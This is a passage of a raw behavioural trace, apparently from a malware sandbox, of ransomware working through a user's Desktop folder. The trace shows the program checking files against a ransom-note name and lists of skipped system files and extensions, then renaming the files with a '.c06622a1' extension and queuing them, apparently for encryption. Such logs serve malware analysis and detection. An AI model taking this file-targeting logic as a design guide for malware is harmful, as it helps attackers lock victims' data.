HALPmcxz\\Desktop\\Id8szDz7a0w" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\") returned="" [0147.965] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\") returned 0x36 [0147.965] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\*", fInfoLevelId=0x0, lpFindFileData=0x3fea6c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3fea6c) returned 0x2db8780 [0147.965] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x21bcf3c0, ftCreationTime.dwHighDateTime=0x1d5df1b, ftLastAccessTime.dwLowDateTime=0xd6cdf760, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xd6cdf760, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.965] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6d49b80, ftCreationTime.dwHighDateTime=0x1d5df42, ftLastAccessTime.dwLowDateTime=0x515c1250, ftLastAccessTime.dwHighDateTime=0x1d5e623, ftLastWriteTime.dwLowDateTime=0x515c1250, ftLastWriteTime.dwHighDateTime=0x1d5e623, nFileSizeHigh=0x0, nFileSizeLow=0x890f, dwReserved0=0x0, dwReserved1=0x0, cFileName="3dCTOiv4.pdf", cAlternateFileName="")) returned 1 [0147.965] _wcsicmp (_Str1="3dCTOiv4.pdf", _Str2="README.c06622a1.TXT") returned -63 [0147.965] wcsstr (_Str="3dCTOiv4.pdf", _SubStr="README") returned 0x0 [0147.965] _wcsicmp (_Str1="autorun.inf", _Str2="3dCTOiv4.pdf") returned 46 [0147.965] wcslen (_String="autorun.inf") returned 0xb [0147.965] _wcsicmp (_Str1="boot.ini", _Str2="3dCTOiv4.pdf") returned 47 [0147.965] wcslen (_String="boot.ini") returned 0x8 [0147.965] _wcsicmp (_Str1="bootfont.bin", _Str2="3dCTOiv4.pdf") returned 47 [0147.965] wcslen (_String="bootfont.bin") returned 0xc [0147.965] _wcsicmp (_Str1="bootsect.bak", _Str2="3dCTOiv4.pdf") returned 47 [0147.965] wcslen (_String="bootsect.bak") returned 0xc [0147.965] _wcsicmp (_Str1="desktop.ini", _Str2="3dCTOiv4.pdf") returned 49 [0147.966] wcslen (_String="desktop.ini") returned 0xb [0147.966] _wcsicmp (_Str1="iconcache.db", _Str2="3dCTOiv4.pdf") returned 54 [0147.966] wcslen (_String="iconcache.db") returned 0xc [0147.966] _wcsicmp (_Str1="ntldr", _Str2="3dCTOiv4.pdf") returned 59 [0147.966] wcslen (_String="ntldr") returned 0x5 [0147.966] _wcsicmp (_Str1="ntuser.dat", _Str2="3dCTOiv4.pdf") returned 59 [0147.966] wcslen (_String="ntuser.dat") returned 0xa [0147.966] _wcsicmp (_Str1="ntuser.dat.log", _Str2="3dCTOiv4.pdf") returned 59 [0147.966] wcslen (_String="ntuser.dat.log") returned 0xe [0147.966] _wcsicmp (_Str1="ntuser.ini", _Str2="3dCTOiv4.pdf") returned 59 [0147.966] wcslen (_String="ntuser.ini") returned 0xa [0147.966] _wcsicmp (_Str1="thumbs.db", _Str2="3dCTOiv4.pdf") returned 65 [0147.966] wcslen (_String="thumbs.db") returned 0x9 [0147.966] _wcsicmp (_Str1="386", _Str2="pdf") returned -61 [0147.966] wcslen (_String="386") returned 0x3 [0147.966] _wcsicmp (_Str1="adv", _Str2="pdf") returned -15 [0147.966] wcslen (_String="adv") returned 0x3 [0147.966] _wcsicmp (_Str1="ani", _Str2="pdf") returned -15 [0147.966] wcslen (_String="ani") returned 0x3 [0147.966] _wcsicmp (_Str1="bat", _Str2="pdf") returned -14 [0147.966] wcslen (_String="bat") returned 0x3 [0147.966] _wcsicmp (_Str1="bin", _Str2="pdf") returned -14 [0147.966] wcslen (_String="bin") returned 0x3 [0147.966] _wcsicmp (_Str1="cab", _Str2="pdf") returned -13 [0147.966] wcslen (_String="cab") returned 0x3 [0147.966] _wcsicmp (_Str1="cmd", _Str2="pdf") returned -13 [0147.966] wcslen (_String="cmd") returned 0x3 [0147.966] _wcsicmp (_Str1="com", _Str2="pdf") returned -13 [0147.966] wcslen (_String="com") returned 0x3 [0147.966] _wcsicmp (_Str1="cpl", _Str2="pdf") returned -13 [0147.966] wcslen (_String="cpl") returned 0x3 [0147.966] _wcsicmp (_Str1="cur", _Str2="pdf") returned -13 [0147.966] wcslen (_String="cur") returned 0x3 [0147.966] _wcsicmp (_Str1="deskthemepack", _Str2="pdf") returned -12 [0147.966] wcslen (_String="deskthemepack") returned 0xd [0147.966] _wcsicmp (_Str1="diagcab", _Str2="pdf") returned -12 [0147.966] wcslen (_String="diagcab") returned 0x7 [0147.967] _wcsicmp (_Str1="diagcfg", _Str2="pdf") returned -12 [0147.967] wcslen (_String="diagcfg") returned 0x7 [0147.967] _wcsicmp (_Str1="diagpkg", _Str2="pdf") returned -12 [0147.967] wcslen (_String="diagpkg") returned 0x7 [0147.967] _wcsicmp (_Str1="dll", _Str2="pdf") returned -12 [0147.967] wcslen (_String="dll") returned 0x3 [0147.967] _wcsicmp (_Str1="drv", _Str2="pdf") returned -12 [0147.967] wcslen (_String="drv") returned 0x3 [0147.967] _wcsicmp (_Str1="exe", _Str2="pdf") returned -11 [0147.967] wcslen (_String="exe") returned 0x3 [0147.967] _wcsicmp (_Str1="hlp", _Str2="pdf") returned -8 [0147.967] wcslen (_String="hlp") returned 0x3 [0147.967] _wcsicmp (_Str1="icl", _Str2="pdf") returned -7 [0147.967] wcslen (_String="icl") returned 0x3 [0147.967] _wcsicmp (_Str1="icns", _Str2="pdf") returned -7 [0147.967] wcslen (_String="icns") returned 0x4 [0147.967] _wcsicmp (_Str1="ico", _Str2="pdf") returned -7 [0147.967] wcslen (_String="ico") returned 0x3 [0147.967] _wcsicmp (_Str1="ics", _Str2="pdf") returned -7 [0147.967] wcslen (_String="ics") returned 0x3 [0147.967] _wcsicmp (_Str1="idx", _Str2="pdf") returned -7 [0147.967] wcslen (_String="idx") returned 0x3 [0147.967] _wcsicmp (_Str1="ldf", _Str2="pdf") returned -4 [0147.967] wcslen (_String="ldf") returned 0x3 [0147.967] _wcsicmp (_Str1="lnk", _Str2="pdf") returned -4 [0147.967] wcslen (_String="lnk") returned 0x3 [0147.967] _wcsicmp (_Str1="mod", _Str2="pdf") returned -3 [0147.967] wcslen (_String="mod") returned 0x3 [0147.967] _wcsicmp (_Str1="mpa", _Str2="pdf") returned -3 [0147.967] wcslen (_String="mpa") returned 0x3 [0147.967] _wcsicmp (_Str1="msc", _Str2="pdf") returned -3 [0147.967] wcslen (_String="msc") returned 0x3 [0147.967] _wcsicmp (_Str1="msp", _Str2="pdf") returned -3 [0147.967] wcslen (_String="msp") returned 0x3 [0147.967] _wcsicmp (_Str1="msstyles", _Str2="pdf") returned -3 [0147.967] wcslen (_String="msstyles") returned 0x8 [0147.967] _wcsicmp (_Str1="msu", _Str2="pdf") returned -3 [0147.968] wcslen (_String="msu") returned 0x3 [0147.968] _wcsicmp (_Str1="nls", _Str2="pdf") returned -2 [0147.968] wcslen (_String="nls") returned 0x3 [0147.968] _wcsicmp (_Str1="nomedia", _Str2="pdf") returned -2 [0147.968] wcslen (_String="nomedia") returned 0x7 [0147.968] _wcsicmp (_Str1="ocx", _Str2="pdf") returned -1 [0147.968] wcslen (_String="ocx") returned 0x3 [0147.968] _wcsicmp (_Str1="prf", _Str2="pdf") returned 14 [0147.968] wcslen (_String="prf") returned 0x3 [0147.968] _wcsicmp (_Str1="ps1", _Str2="pdf") returned 15 [0147.968] wcslen (_String="ps1") returned 0x3 [0147.968] _wcsicmp (_Str1="rom", _Str2="pdf") returned 2 [0147.968] wcslen (_String="rom") returned 0x3 [0147.968] _wcsicmp (_Str1="rtp", _Str2="pdf") returned 2 [0147.968] wcslen (_String="rtp") returned 0x3 [0147.968] _wcsicmp (_Str1="scr", _Str2="pdf") returned 3 [0147.968] wcslen (_String="scr") returned 0x3 [0147.968] _wcsicmp (_Str1="shs", _Str2="pdf") returned 3 [0147.968] wcslen (_String="shs") returned 0x3 [0147.968] _wcsicmp (_Str1="spl", _Str2="pdf") returned 3 [0147.968] wcslen (_String="spl") returned 0x3 [0147.968] _wcsicmp (_Str1="sys", _Str2="pdf") returned 3 [0147.968] wcslen (_String="sys") returned 0x3 [0147.968] _wcsicmp (_Str1="theme", _Str2="pdf") returned 4 [0147.968] wcslen (_String="theme") returned 0x5 [0147.968] _wcsicmp (_Str1="themepack", _Str2="pdf") returned 4 [0147.968] wcslen (_String="themepack") returned 0x9 [0147.968] _wcsicmp (_Str1="wpx", _Str2="pdf") returned 7 [0147.968] wcslen (_String="wpx") returned 0x3 [0147.968] _wcsicmp (_Str1="lock", _Str2="pdf") returned -4 [0147.968] wcslen (_String="lock") returned 0x4 [0147.968] _wcsicmp (_Str1="key", _Str2="pdf") returned -5 [0147.968] wcslen (_String="key") returned 0x3 [0147.968] _wcsicmp (_Str1="hta", _Str2="pdf") returned -8 [0147.968] wcslen (_String="hta") returned 0x3 [0147.968] _wcsicmp (_Str1="msi", _Str2="pdf") returned -3 [0147.968] wcslen (_String="msi") returned 0x3 [0147.969] _wcsicmp (_Str1="pdb", _Str2="pdf") returned -4 [0147.969] wcslen (_String="pdb") returned 0x3 [0147.969] _wcsicmp (_Str1="sql", _Str2="pdf") returned 3 [0147.969] wcslen (_String="sql") returned 0x3 [0147.969] _wcsicmp (_Str1="sqlite", _Str2="pdf") returned 3 [0147.969] wcslen (_String="sqlite") returned 0x6 [0147.969] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w")) returned 0x10 [0147.969] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0147.969] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w" [0147.969] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w") returned 0x35 [0147.969] wcscpy (in: _Dest=0x45000fc, _Source="3dCTOiv4.pdf" | out: _Dest="3dCTOiv4.pdf") returned="3dCTOiv4.pdf" [0147.969] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\3dCTOiv4.pdf", dwFileAttributes=0x80) returned 1 [0147.969] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\3dCTOiv4.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w\\3dctoiv4.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0147.969] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.969] ReadFile (in: hFile=0x644, lpBuffer=0x3fe8f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe984, lpOverlapped=0x0 | out: lpBuffer=0x3fe8f4*, lpNumberOfBytesRead=0x3fe984*=0x90, lpOverlapped=0x0) returned 1 [0147.970] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe8f4, Length=0x80) returned 0x4f743b07 [0147.970] RtlComputeCrc32 (PartialCrc=0x3b07, Buffer=0x3fe8f4, Length=0x80) returned 0x747a565 [0147.970] RtlComputeCrc32 (PartialCrc=0xa565, Buffer=0x3fe8f4, Length=0x80) returned 0x7b5dd4b7 [0147.970] RtlComputeCrc32 (PartialCrc=0xd4b7, Buffer=0x3fe8f4, Length=0x80) returned 0x8c11171e [0147.970] RtlComputeCrc32 (PartialCrc=0x171e, Buffer=0x3fe8f4, Length=0x80) returned 0x24b61f1d [0147.970] CloseHandle (hObject=0x644) returned 1 [0147.970] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0147.970] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\3dCTOiv4.pdf" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\3dCTOiv4.pdf") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\3dCTOiv4.pdf" [0147.970] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\3dCTOiv4.pdf") returned 0x42 [0147.970] wcscpy (in: _Dest=0x451011c, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0147.970] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\3dCTOiv4.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w\\3dctoiv4.pdf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\3dCTOiv4.pdf.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w\\3dctoiv4.pdf.c06622a1"), dwFlags=0x8) returned 1 [0147.979] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\3dCTOiv4.pdf.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w\\3dctoiv4.pdf.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x644 [0147.979] CreateIoCompletionPort (FileHandle=0x644, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0147.979] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4a60020 [0147.995] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6daa5b61 [0147.995] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x771bf33 [0147.995] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x64d3f9fc [0147.995] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5cdccba3 [0147.995] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x346e34fe [0147.995] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x13cf1178 [0147.995] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x102c9f57 [0147.995] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x31057e4f [0147.999] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4a60094, Length=0x80) returned 0x1a5372d9 [0147.999] RtlComputeCrc32 (PartialCrc=0x72d9, Buffer=0x4a60094, Length=0x80) returned 0xb836d6f0 [0147.999] RtlComputeCrc32 (PartialCrc=0xd6f0, Buffer=0x4a60094, Length=0x80) returned 0xa79e4940 [0147.999] RtlComputeCrc32 (PartialCrc=0x4940, Buffer=0x4a60094, Length=0x80) returned 0x8e41ab72 [0147.999] RtlComputeCrc32 (PartialCrc=0xab72, Buffer=0x4a60094, Length=0x80) returned 0x6149be4d [0147.999] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4a60020) returned 1 [0147.999] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0147.999] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0147.999] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93becf50, ftCreationTime.dwHighDateTime=0x1d5e00d, ftLastAccessTime.dwLowDateTime=0x1d7ad8a0, ftLastAccessTime.dwHighDateTime=0x1d5daba, ftLastWriteTime.dwLowDateTime=0x1d7ad8a0, ftLastWriteTime.dwHighDateTime=0x1d5daba, nFileSizeHigh=0x0, nFileSizeLow=0x18e31, dwReserved0=0x0, dwReserved1=0x0, cFileName="6JN0wpz-eY.mkv", cAlternateFileName="6JN0WP~1.MKV")) returned 1 [0147.999] _wcsicmp (_Str1="6JN0wpz-eY.mkv", _Str2="README.c06622a1.TXT") returned -60 [0147.999] wcsstr (_Str="6JN0wpz-eY.mkv", _SubStr="README") returned 0x0 [0147.999] _wcsicmp (_Str1="autorun.inf", _Str2="6JN0wpz-eY.mkv") returned 43 [0147.999] wcslen (_String="autorun.inf") returned 0xb [0147.999] _wcsicmp (_Str1="boot.ini", _Str2="6JN0wpz-eY.mkv") returned 44 [0147.999] wcslen (_String="boot.ini") returned 0x8 [0148.000] _wcsicmp (_Str1="bootfont.bin", _Str2="6JN0wpz-eY.mkv") returned 44 [0148.000] wcslen (_String="bootfont.bin") returned 0xc [0148.000] _wcsicmp (_Str1="bootsect.bak", _Str2="6JN0wpz-eY.mkv") returned 44 [0148.000] wcslen (_String="bootsect.bak") returned 0xc [0148.000] _wcsicmp (_Str1="desktop.ini", _Str2="6JN0wpz-eY.mkv") returned 46 [0148.000] wcslen (_String="desktop.ini") returned 0xb [0148.000] _wcsicmp (_Str1="iconcache.db", _Str2="6JN0wpz-eY.mkv") returned 51 [0148.000] wcslen (_String="iconcache.db") returned 0xc [0148.000] _wcsicmp (_Str1="ntldr", _Str2="6JN0wpz-eY.mkv") returned 56 [0148.000] wcslen (_String="ntldr") returned 0x5 [0148.000] _wcsicmp (_Str1="ntuser.dat", _Str2="6JN0wpz-eY.mkv") returned 56 [0148.000] wcslen (_String="ntuser.dat") returned 0xa [0148.000] _wcsicmp (_Str1="ntuser.dat.log", _Str2="6JN0wpz-eY.mkv") returned 56 [0148.000] wcslen (_String="ntuser.dat.log") returned 0xe [0148.000] _wcsicmp (_Str1="ntuser.ini", _Str2="6JN0wpz-eY.mkv") returned 56 [0148.000] wcslen (_String="ntuser.ini") returned 0xa [0148.000] _wcsicmp (_Str1="thumbs.db", _Str2="6JN0wpz-eY.mkv") returned 62 [0148.000] wcslen (_String="thumbs.db") returned 0x9 [0148.000] _wcsicmp (_Str1="386", _Str2="mkv") returned -58 [0148.000] wcslen (_String="386") returned 0x3 [0148.000] _wcsicmp (_Str1="adv", _Str2="mkv") returned -12 [0148.000] wcslen (_String="adv") returned 0x3 [0148.001] _wcsicmp (_Str1="ani", _Str2="mkv") returned -12 [0148.001] wcslen (_String="ani") returned 0x3 [0148.001] _wcsicmp (_Str1="bat", _Str2="mkv") returned -11 [0148.001] wcslen (_String="bat") returned 0x3 [0148.001] _wcsicmp (_Str1="bin", _Str2="mkv") returned -11 [0148.001] wcslen (_String="bin") returned 0x3 [0148.001] _wcsicmp (_Str1="cab", _Str2="mkv") returned -10 [0148.001] wcslen (_String="cab") returned 0x3 [0148.001] _wcsicmp (_Str1="cmd", _Str2="mkv") returned -10 [0148.001] wcslen (_String="cmd") returned 0x3 [0148.001] _wcsicmp (_Str1="com", _Str2="mkv") returned -10 [0148.001] wcslen (_String="com") returned 0x3 [0148.001] _wcsicmp (_Str1="cpl", _Str2="mkv") returned -10 [0148.001] wcslen (_String="cpl") returned 0x3 [0148.001] _wcsicmp (_Str1="cur", _Str2="mkv") returned -10 [0148.001] wcslen (_String="cur") returned 0x3 [0148.001] _wcsicmp (_Str1="deskthemepack", _Str2="mkv") returned -9 [0148.001] wcslen (_String="deskthemepack") returned 0xd [0148.001] _wcsicmp (_Str1="diagcab", _Str2="mkv") returned -9 [0148.001] wcslen (_String="diagcab") returned 0x7 [0148.001] _wcsicmp (_Str1="diagcfg", _Str2="mkv") returned -9 [0148.001] wcslen (_String="diagcfg") returned 0x7 [0148.001] _wcsicmp (_Str1="diagpkg", _Str2="mkv") returned -9 [0148.002] wcslen (_String="diagpkg") returned 0x7 [0148.002] _wcsicmp (_Str1="dll", _Str2="mkv") returned -9 [0148.002] wcslen (_String="dll") returned 0x3 [0148.002] _wcsicmp (_Str1="drv", _Str2="mkv") returned -9 [0148.002] wcslen (_String="drv") returned 0x3 [0148.002] _wcsicmp (_Str1="exe", _Str2="mkv") returned -8 [0148.002] wcslen (_String="exe") returned 0x3 [0148.002] _wcsicmp (_Str1="hlp", _Str2="mkv") returned -5 [0148.002] wcslen (_String="hlp") returned 0x3 [0148.002] _wcsicmp (_Str1="icl", _Str2="mkv") returned -4 [0148.002] wcslen (_String="icl") returned 0x3 [0148.002] _wcsicmp (_Str1="icns", _Str2="mkv") returned -4 [0148.002] wcslen (_String="icns") returned 0x4 [0148.002] _wcsicmp (_Str1="ico", _Str2="mkv") returned -4 [0148.002] wcslen (_String="ico") returned 0x3 [0148.002] _wcsicmp (_Str1="ics", _Str2="mkv") returned -4 [0148.002] wcslen (_String="ics") returned 0x3 [0148.002] _wcsicmp (_Str1="idx", _Str2="mkv") returned -4 [0148.002] wcslen (_String="idx") returned 0x3 [0148.002] _wcsicmp (_Str1="ldf", _Str2="mkv") returned -1 [0148.002] wcslen (_String="ldf") returned 0x3 [0148.002] _wcsicmp (_Str1="lnk", _Str2="mkv") returned -1 [0148.002] wcslen (_String="lnk") returned 0x3 [0148.003] _wcsicmp (_Str1="mod", _Str2="mkv") returned 4 [0148.003] wcslen (_String="mod") returned 0x3 [0148.003] _wcsicmp (_Str1="mpa", _Str2="mkv") returned 5 [0148.003] wcslen (_String="mpa") returned 0x3 [0148.003] _wcsicmp (_Str1="msc", _Str2="mkv") returned 8 [0148.003] wcslen (_String="msc") returned 0x3 [0148.003] _wcsicmp (_Str1="msp", _Str2="mkv") returned 8 [0148.003] wcslen (_String="msp") returned 0x3 [0148.003] _wcsicmp (_Str1="msstyles", _Str2="mkv") returned 8 [0148.003] wcslen (_String="msstyles") returned 0x8 [0148.003] _wcsicmp (_Str1="msu", _Str2="mkv") returned 8 [0148.003] wcslen (_String="msu") returned 0x3 [0148.003] _wcsicmp (_Str1="nls", _Str2="mkv") returned 1 [0148.003] wcslen (_String="nls") returned 0x3 [0148.003] _wcsicmp (_Str1="nomedia", _Str2="mkv") returned 1 [0148.003] wcslen (_String="nomedia") returned 0x7 [0148.003] _wcsicmp (_Str1="ocx", _Str2="mkv") returned 2 [0148.003] wcslen (_String="ocx") returned 0x3 [0148.003] _wcsicmp (_Str1="prf", _Str2="mkv") returned 3 [0148.003] wcslen (_String="prf") returned 0x3 [0148.003] _wcsicmp (_Str1="ps1", _Str2="mkv") returned 3 [0148.003] wcslen (_String="ps1") returned 0x3 [0148.003] _wcsicmp (_Str1="rom", _Str2="mkv") returned 5 [0148.004] wcslen (_String="rom") returned 0x3 [0148.004] _wcsicmp (_Str1="rtp", _Str2="mkv") returned 5 [0148.004] wcslen (_String="rtp") returned 0x3 [0148.004] _wcsicmp (_Str1="scr", _Str2="mkv") returned 6 [0148.004] wcslen (_String="scr") returned 0x3 [0148.004] _wcsicmp (_Str1="shs", _Str2="mkv") returned 6 [0148.004] wcslen (_String="shs") returned 0x3 [0148.004] _wcsicmp (_Str1="spl", _Str2="mkv") returned 6 [0148.004] wcslen (_String="spl") returned 0x3 [0148.004] _wcsicmp (_Str1="sys", _Str2="mkv") returned 6 [0148.004] wcslen (_String="sys") returned 0x3 [0148.004] _wcsicmp (_Str1="theme", _Str2="mkv") returned 7 [0148.004] wcslen (_String="theme") returned 0x5 [0148.004] _wcsicmp (_Str1="themepack", _Str2="mkv") returned 7 [0148.004] wcslen (_String="themepack") returned 0x9 [0148.004] _wcsicmp (_Str1="wpx", _Str2="mkv") returned 10 [0148.004] wcslen (_String="wpx") returned 0x3 [0148.004] _wcsicmp (_Str1="lock", _Str2="mkv") returned -1 [0148.004] wcslen (_String="lock") returned 0x4 [0148.004] _wcsicmp (_Str1="key", _Str2="mkv") returned -2 [0148.004] wcslen (_String="key") returned 0x3 [0148.004] _wcsicmp (_Str1="hta", _Str2="mkv") returned -5 [0148.004] wcslen (_String="hta") returned 0x3 [0148.005] _wcsicmp (_Str1="msi", _Str2="mkv") returned 8 [0148.005] wcslen (_String="msi") returned 0x3 [0148.005] _wcsicmp (_Str1="pdb", _Str2="mkv") returned 3 [0148.005] wcslen (_String="pdb") returned 0x3 [0148.005] _wcsicmp (_Str1="sql", _Str2="mkv") returned 6 [0148.005] wcslen (_String="sql") returned 0x3 [0148.005] _wcsicmp (_Str1="sqlite", _Str2="mkv") returned 6 [0148.005] wcslen (_String="sqlite") returned 0x6 [0148.005] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w")) returned 0x10 [0148.005] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0148.005] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w" [0148.005] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w") returned 0x35 [0148.005] wcscpy (in: _Dest=0x45000fc, _Source="6JN0wpz-eY.mkv" | out: _Dest="6JN0wpz-eY.mkv") returned="6JN0wpz-eY.mkv" [0148.005] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\6JN0wpz-eY.mkv", dwFileAttributes=0x80) returned 1 [0148.013] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\6JN0wpz-eY.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w\\6jn0wpz-ey.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e0 [0148.014] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.014] ReadFile (in: hFile=0x2e0, lpBuffer=0x3fe8f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe984, lpOverlapped=0x0 | out: lpBuffer=0x3fe8f4*, lpNumberOfBytesRead=0x3fe984*=0x90, lpOverlapped=0x0) returned 1 [0148.014] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe8f4, Length=0x80) returned 0xa5f60d9f [0148.014] RtlComputeCrc32 (PartialCrc=0xd9f, Buffer=0x3fe8f4, Length=0x80) returned 0x36543101 [0148.014] RtlComputeCrc32 (PartialCrc=0x3101, Buffer=0x3fe8f4, Length=0x80) returned 0x429761a3 [0148.015] RtlComputeCrc32 (PartialCrc=0x61a3, Buffer=0x3fe8f4, Length=0x80) returned 0x8454e4d5 [0148.015] RtlComputeCrc32 (PartialCrc=0xe4d5, Buffer=0x3fe8f4, Length=0x80) returned 0x5b3312c7 [0148.015] CloseHandle (hObject=0x2e0) returned 1 [0148.015] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0148.015] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\6JN0wpz-eY.mkv" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\6JN0wpz-eY.mkv") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\6JN0wpz-eY.mkv" [0148.015] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\6JN0wpz-eY.mkv") returned 0x44 [0148.015] wcscpy (in: _Dest=0x4510120, 